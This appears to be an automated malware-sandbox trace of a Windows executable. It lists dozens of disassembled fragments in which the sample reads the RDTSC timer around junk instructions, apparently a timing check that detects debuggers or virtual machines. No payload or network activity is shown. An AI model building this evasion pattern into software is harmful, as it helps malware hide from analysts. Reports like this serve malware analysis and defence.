Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0DBCB second address: E0DBE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FA790B33256h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E11261 second address: E1127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C97h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1127C second address: E11293 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA790B3325Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E11293 second address: E1129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1140C second address: E1141B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B3325Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1587D second address: E15890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007FA7911D2C8Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E159FF second address: E15A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E15A03 second address: E15A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E15A1A second address: E15A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B3325Fh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1610F second address: E16115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E16115 second address: E16146 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA790B33256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FA790B33268h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jns 00007FA790B33256h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E16146 second address: E1614C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1D85A second address: E1D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1BA3F second address: E1BA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA7911D2C86h 0x0000000a jmp 00007FA7911D2C8Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1BA53 second address: E1BA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1CFBF second address: E1CFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1CFC3 second address: E1CFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1D57B second address: E1D59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FA7911D2CB2h 0x0000000b jmp 00007FA7911D2C94h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1D59E second address: E1D5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1D5A2 second address: E1D5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E1D5A6 second address: E1D5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E231F3 second address: E231FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26483 second address: E264A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA790B33256h 0x0000000a popad 0x0000000b jmp 00007FA790B33265h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E264A3 second address: E264C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA7911D2C94h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FA7911D2C86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26A59 second address: E26A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26A5F second address: E26A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 jp 00007FA7911D2C86h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26A6E second address: E26A95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B3325Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA790B33267h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26BC3 second address: E26BED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA7911D2C94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA7911D2C8Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26D5D second address: E26D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26D62 second address: E26D76 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA7911D2C8Eh 0x00000008 jl 00007FA7911D2C86h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26D76 second address: E26D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26D7C second address: E26D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E26D80 second address: E26D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2CF4D second address: E2CF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA7911D2C91h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2CF66 second address: E2CF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA790B33256h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FA790B33261h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jnp 00007FA790B33258h 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2CF9A second address: E2CFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA7911D2C86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2CFA4 second address: E2CFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D103 second address: E2D10B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D3ED second address: E2D3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA790B33256h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D3FF second address: E2D403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D403 second address: E2D414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FA790B33275h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D6FC second address: E2D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2D898 second address: E2D89F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2C700 second address: E2C71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA7911D2C94h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2C71E second address: E2C724 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E2C724 second address: E2C745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA7911D2C90h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007FA7911D2C86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E386B2 second address: E386B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E45143 second address: E45147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E44CF7 second address: E44CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E4ABF4 second address: E4AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FA7911D2C86h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E4AC00 second address: E4AC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E539C6 second address: E539D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FA7911D2C86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E53814 second address: E53818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E53818 second address: E53844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FA7911D2C8Bh 0x0000000f jc 00007FA7911D2C86h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA7911D2C8Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E53844 second address: E53863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33266h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5A448 second address: E5A44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5A44C second address: E5A466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA790B3325Fh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5A2CE second address: E5A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5C6D5 second address: E5C6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B33264h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5C6F1 second address: E5C6FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5EA24 second address: E5EA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5EA2A second address: E5EA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5EA30 second address: E5EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B33262h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5EA47 second address: E5EA4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E5EA4C second address: E5EA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E63114 second address: E63133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C96h 0x00000009 push esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E6328F second address: E632D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33268h 0x00000007 jmp 00007FA790B3325Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f je 00007FA790B3325Ch 0x00000015 ja 00007FA790B33262h 0x0000001b jnl 00007FA790B33256h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E63567 second address: E6358E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA7911D2C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FA7911D2C92h 0x00000010 jmp 00007FA7911D2C8Ah 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a jnl 00007FA7911D2C86h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E6358E second address: E63594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E63594 second address: E6359C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E67D5C second address: E67D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FA790B33256h 0x0000000c jmp 00007FA790B33268h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007FA790B3325Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E67D8F second address: E67D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E67902 second address: E67906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E67906 second address: E6790A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E6790A second address: E67913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E6E613 second address: E6E61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D7D349 second address: D7D35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA790B3325Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D7D35D second address: D7D361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D7D361 second address: D7D367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E78628 second address: E7862F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E7862F second address: E78637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E78459 second address: E7845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E7845D second address: E78476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E78476 second address: E78497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FA7911D2C96h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E85436 second address: E85447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007FA790B33256h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E879EC second address: E879F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E879F2 second address: E879F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E46D second address: E8E477 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA7911D2C86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E477 second address: E8E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E481 second address: E8E497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C92h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E497 second address: E8E49D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E627 second address: E8E62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E62B second address: E8E631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E8E631 second address: E8E637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E91CC5 second address: E91CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA790B33256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E96BBF second address: E96BC9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA7911D2C8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
